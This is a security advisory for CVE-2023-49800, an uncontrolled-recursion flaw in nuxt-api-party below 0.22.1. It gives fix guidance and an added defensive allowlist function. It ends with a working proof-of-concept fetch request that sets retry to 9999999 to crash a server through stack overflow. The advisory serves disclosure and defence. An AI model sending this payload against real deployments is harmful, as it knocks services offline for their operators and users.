Uncontrolled Recursion Affecting nuxt-api-party package, versions <0.22.1
Threat Intelligence
Exploit Maturity: Proof of concept
EPSS: 0.05% (17th percentile)
- Snyk ID SNYK-JS-NUXTAPIPARTY-6115221
- published 11 Dec 2023
- disclosed 9 Dec 2023
- credit OhB00
Introduced: 9 Dec 2023
CVE-2023-49800
How to fix?
Upgrade nuxt-api-party to version 0.22.1 or higher.
Overview
nuxt-api-party is a Nuxt 3 module to securely connect with any API.
Affected versions of this package are vulnerable to Uncontrolled Recursion due to abuse of the retry logic in the ofetch function: options supplied in the client request body are forwarded to ofetch without restriction. An attacker can cause the server to crash from a stack overflow by sending a crafted request with a high number of retry attempts for a URL known to fail.
Workaround
Limit which options can be passed to ofetch.
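The workaround above amounts to an allowlist on the server side. The following is an added example written for this advisory, not code from nuxt-api-party or from Snyk: it assumes a generic server handler that receives the client's JSON body and forwards a subset of it to ofetch. Only `path` and `retry` appear on this page; the other option names in the allowlist (`method`, `query`, `headers`, `body`) and the server-owned defaults are assumptions to adapt to the real handler.

```javascript
// Added example (not nuxt-api-party's own code). Assumption: the server
// handler receives the client's parsed JSON body and forwards options to ofetch.

// Keys a client may influence. Anything controlling retry/timeout behaviour
// (retry, retryDelay, timeout, baseURL, ...) is deliberately absent so the
// client cannot drive the retry loop described in the advisory.
// The exact set is an assumption; adapt it to the endpoint's needs.
const CLIENT_ALLOWED_OPTIONS = new Set(["path", "method", "query", "headers", "body"]);

// Server-owned values, applied after the client's keys so they always win.
// retry: 0 disables ofetch's automatic retries; the numbers are assumptions.
const SERVER_DEFAULTS = Object.freeze({ retry: 0, timeout: 10_000 });

// Build the options object that will actually reach ofetch.
// Returns the sanitized options plus the list of keys that were dropped,
// so the caller can log rejected attempts for detection purposes.
function sanitizeFetchOptions(clientBody) {
  if (clientBody === null || typeof clientBody !== "object" || Array.isArray(clientBody)) {
    throw new TypeError("request body must be a JSON object");
  }
  const safe = {};
  const dropped = [];
  for (const [key, value] of Object.entries(clientBody)) {
    if (CLIENT_ALLOWED_OPTIONS.has(key)) {
      safe[key] = value;
    } else {
      dropped.push(key);
    }
  }
  return { options: { ...safe, ...SERVER_DEFAULTS }, dropped };
}

// Entry point as a handler would call it: parse the raw body, then sanitize.
// Malformed JSON and non-object bodies are rejected rather than forwarded.
function handleApiPartyRequest(rawBody) {
  let parsed;
  try {
    parsed = JSON.parse(rawBody);
  } catch {
    throw new TypeError("request body is not valid JSON");
  }
  return sanitizeFetchOptions(parsed);
}

// Constructed sample body mirroring the shape of the advisory's PoC request.
const SAMPLE_BODY = JSON.stringify({ path: "x:x", retry: 9999999 });

const result = handleApiPartyRequest(SAMPLE_BODY);
console.log("forwarded to ofetch:", result.options);   // retry is 0, not 9999999
console.log("dropped client keys:", result.dropped);    // ["retry"]
```

Logging `dropped` is worth keeping: a body that tries to set `retry`, `retryDelay` or `timeout` is a useful signal that someone is probing the proxy, and the log line costs nothing once the key has already been refused.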
PoC
await fetch("http://localhost:3000/api/__api_party/MyEndpoint", {
method: "POST",
body: JSON.stringify({ path: "x:x", retry: 9999999 }),
headers: { "Content-Type": "application/json" }
})
CVSS Scores (version 3.1)